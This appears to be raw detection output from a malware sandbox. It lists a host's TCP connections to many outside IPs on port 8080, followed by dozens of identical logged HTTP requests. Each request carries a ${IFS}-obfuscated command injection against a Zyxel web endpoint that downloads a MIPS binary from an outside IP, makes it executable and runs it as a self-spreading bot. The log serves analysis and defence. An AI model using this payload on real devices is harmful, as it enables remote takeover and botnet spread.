            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 121.85.139.18:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 176.209.200.89:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 218.7.3.242:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 63.229.219.194:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 104.200.58.211:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 115.79.71.139:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 64.36.170.101:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 99.63.18.75:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 206.0.232.127:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 194.174.77.66:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 36.93.111.165:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 23.211.28.12:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 32.28.80.100:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 199.72.23.164:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 211.218.207.39:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 210.79.29.196:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 177.45.242.7:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 179.157.10.194:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 137.192.129.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 8.53.167.91:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 109.66.233.43:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 111.111.223.102:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 173.89.24.129:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 131.38.237.91:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 18.204.78.103:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 36.237.122.92:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 136.54.144.178:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 153.222.6.71:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 145.226.208.153:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 79.206.230.92:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 34.24.189.41:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 49.5.226.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 189.69.144.22:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 104.175.111.55:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 51.185.72.78:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 80.57.189.239:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 97.38.69.159:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 176.107.228.111:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 129.202.197.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 213.216.224.157:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 136.172.154.221:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 57.248.66.26:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 102.101.249.150:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 19.142.71.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 119.9.169.175:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 45.195.80.216:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 57.255.193.238:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 78.169.45.143:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 171.179.141.159:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 133.34.179.85:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 171.170.55.154:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 198.159.88.75:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 88.195.70.180:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 176.237.46.48:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 133.60.55.43:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 146.137.83.91:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 31.81.232.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 128.27.166.82:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 103.34.119.217:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 203.143.99.213:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 61.252.160.80:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 128.96.178.73:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 191.157.90.55:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 160.88.87.204:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 115.97.83.48:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 45.253.85.249:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 156.194.218.155:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 198.215.28.246:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 76.227.116.98:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 134.161.78.118:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 154.192.58.220:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 128.119.225.134:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 75.46.110.69:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 216.48.52.9:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 176.161.29.241:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 193.94.60.223:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 169.82.14.222:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 182.198.140.127:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 37.147.162.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 147.5.116.212:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 98.236.49.23:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 126.43.252.202:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 205.162.95.210:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 182.139.68.25:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 105.169.108.30:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 63.1.92.212:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 220.72.131.62:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 201.191.23.99:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 181.232.196.185:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 37.211.226.50:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 171.103.229.31:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 82.98.189.197:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 87.231.126.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 32.124.90.121:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 223.63.14.135:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 57.216.118.247:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 171.27.76.10:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 67.147.152.177:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 216.220.110.125:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 117.20.61.216:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 81.166.25.196:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 136.150.111.230:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 34.182.16.55:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 155.37.90.40:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 72.83.88.136:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 40.172.207.53:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 96.226.4.133:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 86.184.139.42:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 159.102.117.198:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 73.64.141.193:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 140.60.204.46:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 174.99.5.86:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 207.223.229.44:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 118.33.194.140:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 159.203.175.79:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 13.10.4.91:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 186.255.198.59:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 209.74.252.19:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 200.30.161.20:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 129.106.19.58:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 48.73.164.133:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 175.33.234.203:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 177.196.42.184:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 58.254.167.180:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 199.15.220.29:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 99.97.3.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 73.164.31.216:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 91.145.131.27:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 24.51.115.72:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 13.130.180.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:16866 -> 59.229.79.210:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
